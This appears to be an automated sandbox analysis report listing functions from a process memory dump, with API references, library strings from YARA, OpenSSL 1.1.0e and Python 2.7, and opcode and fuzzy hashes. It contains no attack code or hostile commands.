Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snprintf
String ID: %s contains .* or .+, consider using .{,N} or .{1,N} with a reasonable value for N$%s in rule %s is slowing down scanning$greedy and ungreedy quantifiers can't be mixed in a regular expression$hex string$invalid %s "%s": %s$regular expression
API String ID: 516210214-3447789961
Opcode ID: 1b83e53b48f963ba4efbf3604d63d7bb2431a64da8199f5ef2c0176d56926d6f
Instruction ID: af441ff1fcac0c5953266d9c667fc5e7b6955dd1eb14f48c8c87defe505e4281
Opcode Fuzzy Hash: 1b83e53b48f963ba4efbf3604d63d7bb2431a64da8199f5ef2c0176d56926d6f
Instruction Fuzzy Hash: EDC17F71A043419FD726DE64D890BE7B3EAEF84718F84491CE98A97341E734ED05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DA6380, Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_sopen_s.MSVCR90 ref: 02DA639F
_filelength.MSVCR90 ref: 02DA63B7
_close.MSVCR90 ref: 02DA63CC

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _close_filelength_sopen_s
String ID:
API String ID: 1367608944-0
Opcode ID: a261a8a20d71f15167111c4033bc4338294aa3b7459effd6681ef448b19e5614
Instruction ID: 268a02d05edc55f2ae4ec0b016c2adad619f5b11c6a07443d3c2bf0b38fa3d0c
Opcode Fuzzy Hash: a261a8a20d71f15167111c4033bc4338294aa3b7459effd6681ef448b19e5614
Instruction Fuzzy Hash: A311DBB25442019BC610DBF8EC4CD8B7798EFC4771F244A29F99BC2280DB31E464D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA10E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02DA1110
_PyObject_CallMethod_SizeT.PYTHON27(?,read,02EB5564,?), ref: 02DA1124
PyGILState_Release.PYTHON27(00000000), ref: 02DA112D
PyString_AsStringAndSize.PYTHON27(00000000,?,?), ref: 02DA1145
memcpy.MSVCR90 ref: 02DA1164

Strings

read, xrefs: 02DA111C

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: SizeState_$CallEnsureMethod_Object_ReleaseStringString_memcpy
String ID: read
API String ID: 3747437082-2555855207
Opcode ID: c9109c5ec34f443e8572254cc4647a7d4f8402f32343c904862aa79b4d464615
Instruction ID: 94491e507b21b363840a895b100b26a7330863dd72bae9f90175b9739d21dfb1
Opcode Fuzzy Hash: c9109c5ec34f443e8572254cc4647a7d4f8402f32343c904862aa79b4d464615
Instruction Fuzzy Hash: 3E2191719803019BD710DF24D8849ABB7E4FF84264F540E1EF8A583340D335DE5ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1DB0, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02AFA968,line %d: %s,?,?), ref: 02DA1DF7

Strings

line %d: %s, xrefs: 02DA1DF1
line %d: %s, xrefs: 02DA1E2F
%s(%d): %s, xrefs: 02DA1DD8
%s(%d): %s, xrefs: 02DA1E16

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: %s(%d): %s$%s(%d): %s$line %d: %s$line %d: %s
API String ID: 376477240-977165427
Opcode ID: 9042a45d9d340ba6d368e940e1d5d1ed738556b3c2b564ed578964515ae67793
Instruction ID: f683ae26e8cc2c8d8cdd0d0a4d1d004d0f30b2cb2d681b021845aef436edc22f
Opcode Fuzzy Hash: 9042a45d9d340ba6d368e940e1d5d1ed738556b3c2b564ed578964515ae67793
Instruction Fuzzy Hash: E601A2B0988341EFD700CF6AD55891BBBE4BB88751F94DCADF4A882300D375D855CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02E10CD0, Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02E10D25
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02E10D4A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 02E10D62
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,00000000), ref: 02E10D87

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46f84c2733a0257fc2b85480d44bae5574d1b7b9e9ac386c8e90fb5cac0699a2
Instruction ID: 6615e366f8002d5201108c4bc7303f6b0eb642f1d4ec0881700120520b17b0f3
Opcode Fuzzy Hash: 46f84c2733a0257fc2b85480d44bae5574d1b7b9e9ac386c8e90fb5cac0699a2
Instruction Fuzzy Hash: 7E41A471AC0209BBDB209A59CC45FBFB3B9EB85728F20C529FD15972C4DB71E9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 02E0DA30, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

isspace.MSVCR90 ref: 02E0DA74
strchr.MSVCR90 ref: 02E0DA8E
isspace.MSVCR90 ref: 02E0DAC8
isspace.MSVCR90 ref: 02E0DADA

Strings

..\..\openssl-1.1.0e\crypto\conf\conf_mod.c, xrefs: 02E0DA3E

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: isspace$strchr
String ID: ..\..\openssl-1.1.0e\crypto\conf\conf_mod.c
API String ID: 3097930973-4068718654
Opcode ID: a00ed86762914f1aad31f97a62bcb6a59da8075c958ba2bbeb249e3602c4cf9d
Instruction ID: 0ba63a0fc6c6df8cfd205382b3153488444f21e58d2de32af6f5e36c23e0f399
Opcode Fuzzy Hash: a00ed86762914f1aad31f97a62bcb6a59da8075c958ba2bbeb249e3602c4cf9d
Instruction Fuzzy Hash: 682148629CC3011BEF214AA65C84BB777B9CF82348F089464FC85971C5EB61E687CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E10730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 02E1075B
CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 02E1078C

Strings

capi_cert_get_fname, xrefs: 02E1073C
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E1076F, 02E1079D, 02E107CC, 02E107EF

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$capi_cert_get_fname
API String ID: 665277682-1942231813
Opcode ID: 8c63fb65164ab5861b2d5afe4c7831004121ed710dce72ef7a91d9c66d1dc78a
Instruction ID: e7d2ce7ad42766bf0dd3821057629706bb3d1f76adef5d81f7578f88b409a5f1
Opcode Fuzzy Hash: 8c63fb65164ab5861b2d5afe4c7831004121ed710dce72ef7a91d9c66d1dc78a
Instruction Fuzzy Hash: 5A115B72BC070176F1207274BC85F6F2349DF80B59F905836F909D62C1EAA2C9A189B5

Uniqueness

Uniqueness Score: -1.00%

Function 02DAE072, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 417COMMON

Download Yara Rule

Strings

wrong type "integer" for ~ operator, xrefs: 02DAE09F
wrong type "boolean" for ~ operator, xrefs: 02DAE0F8
wrong type "string" for ~ operator, xrefs: 02DAE0E3
wrong type "float" for ~ operator, xrefs: 02DAE0C4

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for ~ operator$wrong type "float" for ~ operator$wrong type "integer" for ~ operator$wrong type "string" for ~ operator
API String ID: 0-2147079349
Opcode ID: 618067020f94e455d7c9b6e178b9155f4f717772c651542ce6086f2ea7743fd8
Instruction ID: 3be947e4326c472fa8deb1d5bc3f44b0e53c5aee48efabb93588d085dbf44893
Opcode Fuzzy Hash: 618067020f94e455d7c9b6e178b9155f4f717772c651542ce6086f2ea7743fd8
Instruction Fuzzy Hash: 59027BB0A083419FD314CF18D494AAAB7E5FFC8304F548A2EE5898B352E774DD56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02DAD35C, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 413COMMON

Download Yara Rule

Strings

wrong type "string" for - operator, xrefs: 02DAD3BD
wrong type "boolean" for - operator, xrefs: 02DAD3DC
wrong type "integer" for - operator, xrefs: 02DAD383
wrong type "float" for - operator, xrefs: 02DAD398

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for - operator$wrong type "float" for - operator$wrong type "integer" for - operator$wrong type "string" for - operator
API String ID: 0-1362131687
Opcode ID: d9b546c269560bcdd6ae746e1a0f83fa8240e4b9791e87452000bf1f456ae408
Instruction ID: 3ae331073d314463f817aeb26b836b2955baed25696059479b22ca6ce33821f5
Opcode Fuzzy Hash: d9b546c269560bcdd6ae746e1a0f83fa8240e4b9791e87452000bf1f456ae408
Instruction Fuzzy Hash: FC025AB09083419FD314CF18C4A4A6AB7E5FFC8704F548A2EE5898B391E774DD56CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DACFB7, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

wrong type "integer" for intXXXX or uintXXXX operator, xrefs: 02DACFE5
wrong type "float" for intXXXX or uintXXXX operator, xrefs: 02DAD004
wrong type "boolean" for intXXXX or uintXXXX operator, xrefs: 02DAD03E
wrong type "string" for intXXXX or uintXXXX operator, xrefs: 02DAD019

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for intXXXX or uintXXXX operator$wrong type "float" for intXXXX or uintXXXX operator$wrong type "integer" for intXXXX or uintXXXX operator$wrong type "string" for intXXXX or uintXXXX operator
API String ID: 0-3777382260
Opcode ID: 8cc488bb92bcd2fd5332e9405daf3022fddd8b4e18b8296219a50872c4cbd76a
Instruction ID: c6c6eebb94ab0b85eb3627b13c8e8c5ebf2d4e0398ef246c8b3620e3c7e4c298
Opcode Fuzzy Hash: 8cc488bb92bcd2fd5332e9405daf3022fddd8b4e18b8296219a50872c4cbd76a
Instruction Fuzzy Hash: 3D026CB09083419FD314CF18D494AAAB7E5FFC8304F548A2EE5898B352E774D956CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DAC083, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 402COMMON

Download Yara Rule

Strings

wrong type "float" for at operator, xrefs: 02DAC0B2
wrong type "boolean" for at operator, xrefs: 02DAC0D8
wrong type "string" for at operator, xrefs: 02DAC0C5
wrong type "integer" for at operator, xrefs: 02DAC0A6

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for at operator$wrong type "float" for at operator$wrong type "integer" for at operator$wrong type "string" for at operator
API String ID: 0-3797521198
Opcode ID: 7a32e557db49ef8aad72dcdf3f948eb9662d670094ad4918f2719677e78e4a3b
Instruction ID: 1389d3682905c78578ffd2f0796e36bc7fd699236ef77a2e20bf35cf551a1d4e
Opcode Fuzzy Hash: 7a32e557db49ef8aad72dcdf3f948eb9662d670094ad4918f2719677e78e4a3b
Instruction Fuzzy Hash: FF0248B0A083419FD314CF18C494AAAB7E5FF88704F548A2EE5898B351E774E956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02DE1DB0, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.MSVCR90 ref: 02DE1E62

Part of subcall function 02DE99B0: raise.MSVCR90 ref: 02DE99CB
Part of subcall function 02DE99B0: _exit.MSVCR90 ref: 02DE99D5

Strings

assertion failed: *sbuffer != NULL || buffer != NULL, xrefs: 02DE1DC8
..\..\openssl-1.1.0e\crypto\bio\b_print.c, xrefs: 02DE1DC3, 02DE1DE1, 02DE1E24, 02DE1E47, 02DE1E77
assertion failed: *currlen <= *maxlen, xrefs: 02DE1DE6
assertion failed: *sbuffer != NULL, xrefs: 02DE1E4C

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _exitmemcpyraise
String ID: ..\..\openssl-1.1.0e\crypto\bio\b_print.c$assertion failed: *currlen <= *maxlen$assertion failed: *sbuffer != NULL$assertion failed: *sbuffer != NULL || buffer != NULL
API String ID: 1298853163-2319055813
Opcode ID: a952355c852fa24e79e816299e487338b5f9c28ee27fdad00c76e495eaa4cf44
Instruction ID: f3d8edf97f9081dfc70876109ddd5da6024e24c97d24328c868c51d43bfe71bf
Opcode Fuzzy Hash: a952355c852fa24e79e816299e487338b5f9c28ee27fdad00c76e495eaa4cf44
Instruction Fuzzy Hash: 1521A1B4780201ABFF21BF20DC82B6673A5AB50F04F145468F99E9B385E7B1DD40CB21

Uniqueness

Uniqueness Score: -1.00%

Function 02DE2A00, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 432COMMON

Download Yara Rule

APIs

isdigit.MSVCR90 ref: 02DE2B69
isdigit.MSVCR90 ref: 02DE2BDA

Strings

*, xrefs: 02DE2C07
*, xrefs: 02DE2B90

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: isdigit
String ID: *$*
API String ID: 2326231117-3771216468
Opcode ID: be4ac95c4466a90174402566c320b5fdc709ba95e838d517d20530b34898b29b
Instruction ID: 5950c22be148e6be6e12854290a11e4536ce49b7e0422c1e94675557f655f6b8
Opcode Fuzzy Hash: be4ac95c4466a90174402566c320b5fdc709ba95e838d517d20530b34898b29b
Instruction Fuzzy Hash: AFF147B16482419BEB24EF18C888A6BB7F9FBC9704F14491DF98687390D370ED45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02DE2010, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02DE20F9

Strings

0123456789abcdef, xrefs: 02DE20EC
, xrefs: 02DE20A4
0123456789ABCDEF, xrefs: 02DE20E5

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: $0123456789ABCDEF$0123456789abcdef
API String ID: 1302938615-30751140
Opcode ID: 446b36697905dcbcde923aa045b4e56ddcb26a48f29bebda00feb103ef9ea780
Instruction ID: b2df89aabcb1e36e0b54a8cd3fae557e41c97c90758803214d3621654a892951
Opcode Fuzzy Hash: 446b36697905dcbcde923aa045b4e56ddcb26a48f29bebda00feb103ef9ea780
Instruction Fuzzy Hash: 9F918E71A083418BDB14EF28C88862FB7E5ABC8758F18491DFD8AA7341D771DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DAD76A, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DAD833
_snprintf.MSVCR90 ref: 02DAD88F

Strings

%I64d * %I64d, xrefs: 02DAD87E
, xrefs: 02DAD8EF

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_snprintf
String ID: $%I64d * %I64d
API String ID: 104839420-2201269613
Opcode ID: 7c200e611b05bd993c99dfafd2a7b7c893c84e4030421af339963052137fd65b
Instruction ID: b23dcf55ebdbf463ef4e61d27e98d0356b80ebc4de61bf1ad5712457b83e072b
Opcode Fuzzy Hash: 7c200e611b05bd993c99dfafd2a7b7c893c84e4030421af339963052137fd65b
Instruction Fuzzy Hash: BC512DB46083419FD318CF29C5A4A2AB7E2FFC8700F148A5EE88987751E770EC51CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E109E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82encryptionCOMMON

Download Yara Rule

APIs

CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02E10A04
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02E10A6C
CertFindCertificateInStore.CRYPT32(?,00000001,00000000,00070007,?,00000000), ref: 02E10A97

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E10A56

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnum$CertificateFind
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 3417037084-79188018
Opcode ID: 48e65d640c1e46375bd38ca5134d97fac1917fec350c0d37db43f59d6c53f086
Instruction ID: 9ec2730eb680ca4f1426be8535e9c54c3a844e4ecf0b61776032a48425b59318
Opcode Fuzzy Hash: 48e65d640c1e46375bd38ca5134d97fac1917fec350c0d37db43f59d6c53f086
Instruction Fuzzy Hash: B71136377C42016BEB218638E824B7B7B9A9BC1668F1CD239FC8DD72C1D722D8804210

Uniqueness

Uniqueness Score: -1.00%

Function 02E10650, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000,?), ref: 02E1066B

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02E1067E, 02E106AA, 02E106E9, 02E1070C

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

